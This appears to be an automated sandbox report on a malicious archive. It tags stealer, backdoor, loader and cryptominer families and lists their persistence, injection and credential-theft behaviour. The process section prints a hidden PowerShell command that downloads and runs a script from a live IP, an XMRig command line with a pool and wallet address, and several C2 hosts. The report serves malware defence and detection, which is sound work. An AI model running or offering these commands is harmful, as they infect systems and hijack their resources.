Analysis Overview
SHA256
f50137e69eab731be6ac6e16fe5f5ce536d64b8e5d3786f7a68c6b4a7afc3940
Threat Level: Known bad
The file quarantine.rar was found to be: Known bad.
Malicious Activity Summary
Stealc family
Systembc family
xmrig
SystemBC
Litehttp family
Amadey family
Stealc
Xmrig family
Amadey
LiteHTTP
Identifies VirtualBox via ACPI registry values (likely anti-VM)
XMRig Miner payload
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Command and Scripting Interpreter: PowerShell
Uses browser remote debugging
Downloads MZ/PE file
Identifies Wine through registry keys
Executes dropped EXE
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Checks computer location settings
Drops startup file
Loads dropped DLL
Unsecured Credentials: Credentials In Files
Checks BIOS information in registry
Adds Run key to start application
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of NtSetInformationThreadHideFromDebugger
Enumerates processes with tasklist
Suspicious use of SetThreadContext
Drops file in Windows directory
System Location Discovery: System Language Discovery
Program crash
Unsigned PE
Browser Information Discovery
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Suspicious use of UnmapMainImage
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Enumerates system info in registry
Checks processor information in registry
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2025-03-06 00:51
Signatures
Amadey family
Litehttp family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral8
Detonation Overview
Submitted
2025-03-06 00:51
Reported
2025-03-06 00:54
Platform
win10v2004-20250217-en
Max time kernel
148s
Max time network
147s
Command Line
Signatures
Xmrig family
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3448 set thread context of 3232 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\notepad.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\System32\notepad.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\System32\notepad.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\notepad.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207.exe
"C:\Users\Admin\AppData\Local\Temp\7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\46F7.tmp\46F8.tmp\46F9.bat C:\Users\Admin\AppData\Local\Temp\7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uyzv4noq\uyzv4noq.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8131.tmp" "c:\Users\Admin\AppData\Local\Temp\uyzv4noq\CSCE9117C56EC3B443CB6266D21B26C1192.TMP"
C:\Windows\System32\notepad.exe
--donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=40
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 3232"
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 3232"
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 3232"
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 3232"
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 3232"
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 3232"
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 3232"
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 3232"
Network
| Country | Destination | Domain | Proto |
| NL | 45.144.212.77:16000 | 45.144.212.77 | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 192.248.189.11:443 | pool.hashvault.pro | tcp |
| US | 20.189.173.24:443 | tcp | |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\46F7.tmp\46F8.tmp\46F9.bat
| MD5 | 3895cb9413357f87a88c047ae0d0bd40 |
| SHA1 | 227404dd0f7d7d3ea9601eecd705effe052a6c91 |
| SHA256 | 8140df06ebcda4d8b85bb00c3c0910efc14b75e53e7a1e4f7b6fa515e4164785 |
| SHA512 | a886081127b4888279aba9b86aa50a74d044489cf43819c1dea793a410e39a62413ceb7866f387407327b348341b2ff03cbe2430c57628a5e5402447d3070ca1 |
memory/2264-2-0x00007FFBF4003000-0x00007FFBF4005000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uswhg4kw.r1n.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2264-12-0x0000014FADD30000-0x0000014FADD52000-memory.dmp
memory/2264-13-0x00007FFBF4000000-0x00007FFBF4AC1000-memory.dmp
memory/2264-14-0x00007FFBF4000000-0x00007FFBF4AC1000-memory.dmp
memory/2264-15-0x00007FFBF4003000-0x00007FFBF4005000-memory.dmp
memory/2264-16-0x00007FFBF4000000-0x00007FFBF4AC1000-memory.dmp
memory/2264-20-0x00007FFBF4000000-0x00007FFBF4AC1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 556084f2c6d459c116a69d6fedcc4105 |
| SHA1 | 633e89b9a1e77942d822d14de6708430a3944dbc |
| SHA256 | 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8 |
| SHA512 | 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8d80c45e0e047b75073a3d1c2710c68f |
| SHA1 | babc73cf30327b36d184239a2747ec94d48929f4 |
| SHA256 | 6859c4cad4b17bf02f7f25d9b5b9633491a29c1420ccbdf9342a459d5be05e64 |
| SHA512 | 5da876ce855d1d9a031899d283bf2ac6c53c4d14982a1300e4d128cbde46202a259d1299dfb40c81fcfe5fb6770fb00f404673c13967800392f8f8442a5d2d24 |
C:\Users\Admin\AppData\Local\Temp\installer.ps1
| MD5 | b6d611af4bea8eaaa639bbf024eb0e2d |
| SHA1 | 0b1205546fd80407d85c9bfbed5ff69d00645744 |
| SHA256 | 8cd3bf95cedcf3469d0044976c66cbf22cd2fecf21ae4f94986d7211d6ba9a2b |
| SHA512 | d8a4ec5bd986884959db3edfd48e2bf4c70ead436f81eab73b104aa0ff0f5dadfb6227cb2dab1f979f0dbb3aafbc1889ed571fb6e9444a09ae984b789314463d |
\??\c:\Users\Admin\AppData\Local\Temp\uyzv4noq\uyzv4noq.cmdline
| MD5 | 807f0a5dfb7b5d0671639060841ddfae |
| SHA1 | 17b188d1a8429273ef0c8425ce65d31e5b88dd27 |
| SHA256 | 56fc36bf83529bd8a78d2965a890e35f309e4948d2de904a7856c3d976371bd4 |
| SHA512 | 2611cbefa22cce53bf494dc361604fec9ade10237a0bcb1cf9013a709b517edd9e230f1a00087e04cc1aa3877fadeb3bb6a9840ebe73ad70c6c553fac6c351c2 |
\??\c:\Users\Admin\AppData\Local\Temp\uyzv4noq\uyzv4noq.0.cs
| MD5 | 1809fe3ba081f587330273428ec09c9c |
| SHA1 | d24ea2ea868ae49f46c8a7d894b7fda255ec1cd9 |
| SHA256 | d07a0c5fdf0862325608791f92273e0fc411c294f94d757f1ff0303ba5e03457 |
| SHA512 | e662420fc93a5cefd657f7701432924e6a06482ea147ad814d5e20b16b2f3c13ed2cc6b9caf24c22b7a5b24ad0aa1d216c5804c46d2250522cfc2cadc69f9e28 |
\??\c:\Users\Admin\AppData\Local\Temp\uyzv4noq\CSCE9117C56EC3B443CB6266D21B26C1192.TMP
| MD5 | 021866765f724ce1504a96a6491f3c9b |
| SHA1 | 964643f1f53eac3d8f6e53032182ccd0afba25f9 |
| SHA256 | 907817b4529748d5114146221a9488a3985d098c7aedec565c26d2a5b641cfbc |
| SHA512 | d590b44088ade2521fb3cad1add6bdd55698822dffe24f43b9d4f8b4c593b80f6eac02de716a557dc175e6c5dea5cbb6b04a72cbf5c385636116f6919bc86911 |
C:\Users\Admin\AppData\Local\Temp\RES8131.tmp
| MD5 | 06e81bf18ee9d7d04d1a1bec9bb8d704 |
| SHA1 | 70b92705bad7b26a852cdb05335687254d709cf7 |
| SHA256 | 86b3139a88eb85a774443c88d337e6b6c53ce3b80fac62ba8a725aa3991fca6c |
| SHA512 | f002720416d70032708beafef9f94e52d224f1cbe03eb0b6ceac333283c511f589d4d23eba231a04e6979cc2d9b37ddde96625c7bbc6d77eacb617cac0974ade |
C:\Users\Admin\AppData\Local\Temp\uyzv4noq\uyzv4noq.dll
| MD5 | c339446662f8edacaf1ec7c656dbd534 |
| SHA1 | d4f33a03f783ac9e61de9a18c7d1acf06e42a40d |
| SHA256 | dd318d287160f76fec13d425f09cbedbe4f5ef4ac258687fe1253377a56622f7 |
| SHA512 | a61348accdae412676c4e67d68d088cf4a936703ac890ef3fa23fcd7c654807cb12ea75ad5e9cc8b8f3f5edabb1ce904eaae4f0aae34117cb79e525a5de96f33 |
memory/3424-45-0x0000026EB3B80000-0x0000026EB3B88000-memory.dmp
memory/3448-47-0x000000000D5A0000-0x000000000DE23000-memory.dmp
memory/3232-54-0x00007FF6B8900000-0x00007FF6B91C4000-memory.dmp
memory/3232-55-0x00007FF6B8900000-0x00007FF6B91C4000-memory.dmp
memory/3232-64-0x000002159E7E0000-0x000002159E800000-memory.dmp
memory/3232-63-0x00007FF6B8900000-0x00007FF6B91C4000-memory.dmp
memory/3232-66-0x00007FF6B8900000-0x00007FF6B91C4000-memory.dmp
memory/3232-68-0x00007FF6B8900000-0x00007FF6B91C4000-memory.dmp
memory/3232-67-0x00007FF6B8900000-0x00007FF6B91C4000-memory.dmp
memory/3232-65-0x00007FF6B8900000-0x00007FF6B91C4000-memory.dmp
memory/3232-69-0x00007FF6B8900000-0x00007FF6B91C4000-memory.dmp
memory/3232-70-0x00007FF6B8900000-0x00007FF6B91C4000-memory.dmp
memory/3232-71-0x00007FF6B8900000-0x00007FF6B91C4000-memory.dmp
memory/3232-72-0x00007FF6B8900000-0x00007FF6B91C4000-memory.dmp
memory/3232-73-0x00007FF6B8900000-0x00007FF6B91C4000-memory.dmp
memory/3232-74-0x00007FF6B8900000-0x00007FF6B91C4000-memory.dmp
memory/3232-75-0x00007FF6B8900000-0x00007FF6B91C4000-memory.dmp
memory/3232-76-0x00007FF6B8900000-0x00007FF6B91C4000-memory.dmp
memory/3232-77-0x00007FF6B8900000-0x00007FF6B91C4000-memory.dmp
memory/3232-78-0x00007FF6B8900000-0x00007FF6B91C4000-memory.dmp
memory/3232-79-0x00007FF6B8900000-0x00007FF6B91C4000-memory.dmp
memory/3232-80-0x00007FF6B8900000-0x00007FF6B91C4000-memory.dmp
memory/3232-81-0x00007FF6B8900000-0x00007FF6B91C4000-memory.dmp
memory/3232-82-0x00007FF6B8900000-0x00007FF6B91C4000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2025-03-06 00:51
Reported
2025-03-06 00:54
Platform
win7-20250207-en
Max time kernel
147s
Max time network
151s
Command Line
Signatures
SystemBC
Systembc family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\fvoj\ueob.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\fvoj\ueob.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\fvoj\ueob.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\fvoj\ueob.exe | N/A |
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine | C:\ProgramData\fvoj\ueob.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454.exe | N/A |
| N/A | N/A | C:\ProgramData\fvoj\ueob.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\Test Task17.job | C:\Users\Admin\AppData\Local\Temp\d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\fvoj\ueob.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454.exe | N/A |
| N/A | N/A | C:\ProgramData\fvoj\ueob.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1648 wrote to memory of 2660 | N/A | C:\Windows\system32\taskeng.exe | C:\ProgramData\fvoj\ueob.exe |
| PID 1648 wrote to memory of 2660 | N/A | C:\Windows\system32\taskeng.exe | C:\ProgramData\fvoj\ueob.exe |
| PID 1648 wrote to memory of 2660 | N/A | C:\Windows\system32\taskeng.exe | C:\ProgramData\fvoj\ueob.exe |
| PID 1648 wrote to memory of 2660 | N/A | C:\Windows\system32\taskeng.exe | C:\ProgramData\fvoj\ueob.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454.exe
"C:\Users\Admin\AppData\Local\Temp\d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454.exe"
C:\Windows\system32\taskeng.exe
taskeng.exe {2BD1E1E6-16F1-43D5-97DE-71485ABFE05B} S-1-5-21-677481364-2238709445-1347953534-1000:JXXXDSWS\Admin:Interactive:[1]
C:\ProgramData\fvoj\ueob.exe
C:\ProgramData\fvoj\ueob.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | towerbingobongoboom.com | udp |
| US | 213.209.150.137:4000 | towerbingobongoboom.com | tcp |
| US | 213.209.150.137:4117 | towerbingobongoboom.com | tcp |
Files
memory/2740-0-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2740-1-0x0000000076F90000-0x0000000076F92000-memory.dmp
memory/2740-2-0x0000000000401000-0x0000000000403000-memory.dmp
memory/2740-4-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2740-6-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2740-7-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2740-8-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2740-9-0x0000000000400000-0x0000000000840000-memory.dmp
C:\ProgramData\fvoj\ueob.exe
| MD5 | 1dc908064451d5d79018241cea28bc2f |
| SHA1 | f0d9a7d23603e9dd3974ab15400f5ad3938d657a |
| SHA256 | d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454 |
| SHA512 | 6f072459376181f7ddb211cf615731289706e7d90b7c81e306c6cd5c79311544d0b4be946791ae4fad3c2c034901bc0a2fd5b2a710844e3fe928a92d1cc0814f |
memory/2660-12-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2660-13-0x0000000000400000-0x0000000000840000-memory.dmp
C:\Windows\Tasks\Test Task17.job
| MD5 | dc2bab69606410150c00fa0931960a4e |
| SHA1 | 9a7ae1eda06d87a712fdabde4a7e92bf38e20bae |
| SHA256 | 025457678db09f1c55c3c9a94ad43891fca4b75dd97e03316c4822824e5ee6fc |
| SHA512 | 72516cb393d855ed8e77ba23f46a0a5267ce2a545de9f7c2f52c1d80f30e8ca690fdd0c90deabc46334c2c09a579658d7fe74d15b70b1ab6ea43837b05806bed |
memory/2660-15-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2740-16-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2660-17-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2660-18-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2660-19-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2660-20-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2740-21-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2660-22-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2740-23-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2660-24-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2740-25-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2660-26-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2740-27-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2660-28-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2660-30-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2660-31-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2660-32-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2660-33-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2660-34-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2660-35-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2660-36-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2660-37-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2660-38-0x0000000000400000-0x0000000000840000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2025-03-06 00:51
Reported
2025-03-06 00:54
Platform
win7-20240903-en
Max time kernel
120s
Max time network
149s
Command Line
Signatures
LiteHTTP
Litehttp family
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\fJzVdpCC\\Anubis.exe\"" | C:\Users\Admin\AppData\Local\Temp\df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
